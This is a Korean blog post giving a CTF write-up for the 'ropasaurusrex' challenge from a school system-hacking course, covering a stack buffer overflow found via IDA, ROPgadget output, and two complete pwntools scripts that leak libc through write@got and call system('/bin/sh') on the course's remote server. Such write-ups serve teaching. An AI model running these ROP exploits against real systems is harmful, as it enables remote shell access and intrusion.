[2021/1학기/선린/시스템해킹/소수전공] ropasaurusrex - Write Up

2021. 8. 1. 15:47Wargame CTF/소수전공

문제

 

 

IDA 디컴파일
#main함수

ssize_t __cdecl main()
{
  sub_80483F4();
  return write(1, "WIN\n", 4u);



#sub_80483F4 함수

ssize_t sub_80483F4()
{
  char buf; // [esp+10h] [ebp-88h]

  return read(0, &buf, 0x100u);
}

 

x86 문제로..

sub_80483F4 함수에서의 read는 입력을 0x100 만큼 입력받지만 buf의 크기는 0x88이므로, BOF 발생.

 

 

 

NX 보호기법이 걸려있으므로, 쉘코드로는 불가능합니다.

딱히 특별한 것은 없으므로, ROP를 이용하여 문제를 풀어나가겠습니다.

 

 

분석

1. BUF, SFP를 채워주고, write@plt , write@got 를 이용하여 실제 주소 leak , ret주소를 main으로,

2. libc_base를 구하고, system의 실제 주소를 얻는다.

4. read 함수를 이용해 bss영역에 /bin/sh 를 넣어준다.

5. system 호출, 인자 값 bss ( bss안에는 현재 /bin/sh 의 문자열이 들어있다) > system(/bin/sh)

6. 쉘획득

 

본  ropasaurusrex문제에서는 심볼(symbol)이 깨져있으므로, e.symbols['main']을 이용하지 못한다.

그래서 IDA main주소를 찾아서 그냥 했다..

main = 0x804841D

 

 

 

필요한 가젯.

 

pop ret;

 : system의 인자 1개

 

pop pop ret;

 : write의 인자 3개

 

 

 

명령어 : ROPgadget --binary "파일이름" | grep "pop"

user@user-virtual-machine:~/Desktop/deep pwnable/7-22$ ROPgadget --binary ropasaurusrex | grep "pop"
0x080483c1 : add al, 0x5b ; pop ebp ; ret
0x080482e2 : add al, ch ; fadd dword ptr [ecx] ; add byte ptr [eax], al ; pop eax ; pop ebx ; leave ; ret
0x080482e6 : add byte ptr [eax], al ; pop eax ; pop ebx ; leave ; ret
0x080484b2 : add esp, 0x1c ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x080483bf : add esp, 4 ; pop ebx ; pop ebp ; ret
0x080484e0 : clc ; push dword ptr [ebp - 0xc] ; add esp, 4 ; pop ebx ; pop ebp ; ret
0x080482e4 : fadd dword ptr [ecx] ; add byte ptr [eax], al ; pop eax ; pop ebx ; leave ; ret
0x080484b1 : fiadd word ptr [ebx + 0x5e5b1cc4] ; pop edi ; pop ebp ; ret
0x080484e3 : hlt ; add esp, 4 ; pop ebx ; pop ebp ; ret
0x080484b0 : jb 0x8048490 ; add esp, 0x1c ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x080484e2 : jne 0x80484d8 ; add esp, 4 ; pop ebx ; pop ebp ; ret
0x080483c0 : les eax, ptr [ebx + ebx*2] ; pop ebp ; ret
0x080484b3 : les ebx, ptr [ebx + ebx*2] ; pop esi ; pop edi ; pop ebp ; ret
0x08048451 : mov ebp, esp ; pop ebp ; ret
0x0804844b : nop ; nop ; nop ; nop ; nop ; push ebp ; mov ebp, esp ; pop ebp ; ret
0x0804844c : nop ; nop ; nop ; nop ; push ebp ; mov ebp, esp ; pop ebp ; ret
0x0804844d : nop ; nop ; nop ; push ebp ; mov ebp, esp ; pop ebp ; ret
0x0804844e : nop ; nop ; push ebp ; mov ebp, esp ; pop ebp ; ret
0x0804844f : nop ; push ebp ; mov ebp, esp ; pop ebp ; ret
0x080483bd : or byte ptr [ecx], al ; add esp, 4 ; pop ebx ; pop ebp ; ret
0x080482e8 : pop eax ; pop ebx ; leave ; ret
0x080483c3 : pop ebp ; ret
0x080482e9 : pop ebx ; leave ; ret
0x080483c2 : pop ebx ; pop ebp ; ret
0x080484b5 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x08048504 : pop ecx ; pop ebx ; leave ; ret
0x080484b7 : pop edi ; pop ebp ; ret
0x080484b6 : pop esi ; pop edi ; pop ebp ; ret
0x080484e1 : push dword ptr [ebp - 0xc] ; add esp, 4 ; pop ebx ; pop ebp ; ret
0x08048450 : push ebp ; mov ebp, esp ; pop ebp ; ret
0x080484b4 : sbb al, 0x5b ; pop esi ; pop edi ; pop ebp ; ret

 

 

 

 

1번 풀이.

 > read함수를 이용하여 bss영역에 /bin/sh 를 넣은 후 system을 호출.

 

2번 풀이.

 > libc_Base를 이용해 /bin/sh 의 문자열을 찾은 후 system을 호출 

 

 

Exploti code ( BSS 영역에 Bin/sh 넣기)

 

from pwn import *

context.log_level = 'debug'

p = remote('sunrin.site', 9005)
e = ELF('./ropasaurusrex')
libc = e.libc
 

main = 0x804841D 
write_plt = e.plt['write']
write_got = e.got['write']

read_plt = e.plt['read']
read_got = e.got['read']

binsh = '/bin/sh\x00'

pppr = 0x080484b6
prdi = 0x080483c3
 
payload = 'a' * (0x88 + 0x4)
payload += p32(write_plt)
payload += p32(pppr)
payload += p32(1)
payload += p32(write_got)
payload += p32(8)
payload += p32(main)
 
p.sendline(payload) 
        
leak = u32(p.recvuntil('\xf7')[-4:])
log.info(hex(leak))

libc_base = leak - libc.symbols['write']
log.info(hex(libc_base))

system = libc_base + libc.symbols['system']
log.info(hex(system))


payload2 = 'a' * (0x88 + 0x4)
payload2 += p32(read_plt) 
payload2 += p32(pppr)
payload2 += p32(0) 
payload2 += p32(e.bss()+ 0x200)
payload2 += p32(8) 

payload2 += p32(system)
payload2 += p32(prdi)
payload2 += p32(e.bss()+0x200)


p.send(payload2)
p.send(binsh)


p.interactive()

 

 

 

Exploit code ( Bin/sh 문자열 검색 )
from pwn import *

context.log_level = 'debug'

p = remote('sunrin.site', 9005)
e = ELF('./ropasaurusrex')
libc = e.libc
 

#main = e.sym['main']

main = 0x804841D 
write_plt = e.plt['write']
write_got = e.got['write']

pppr = 0x080484b6
prdi = 0x080483c3
 
payload = 'a' * (0x88 + 0x4)
payload += p32(write_plt)
payload += p32(pppr)
payload += p32(1)
payload += p32(write_got)
payload += p32(8)
payload += p32(main)
 
p.sendline(payload) 
        
leak = u32(p.recv(4))
log.info(hex(leak))

libc_base = leak - libc.symbols['write']
log.info(hex(libc_base))

system = libc_base + libc.symbols['system']
log.info(hex(system))

binsh = libc_base + list(libc.search('/bin/sh'))[0]
log.info(hex(binsh))


payload2 = 'a' * (0x88 + 0x4)
payload2 += p32(system)
payload2 += p32(prdi)
payload2 += p32(binsh)

p.sendline(payload2) 


p.interactive()

 

 

 

FLAG

 

저작자표시 비영리 동일조건 (새창열림)

'Wargame CTF > 소수전공' 카테고리의 다른 글

[2021/1학기/선린/시스템해킹/소수전공] BaskinRobins31 - Write Up  (0) 2021.08.01
[2021/1학기/선린/시스템해킹/소수전공] rop64 v2 - Write Up  (0) 2021.08.01
[2021/1학기/선린/시스템해킹/소수전공] rop32 v2 - Write Up  (0) 2021.08.01
[2021/1학기/선린/시스템해킹/소수전공] rop32 - Write Up  (0) 2021.08.01

관련글

티스토리툴바